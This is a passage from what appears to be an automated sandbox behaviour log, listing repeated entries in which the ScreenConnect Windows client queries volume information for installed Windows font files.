Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF | VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
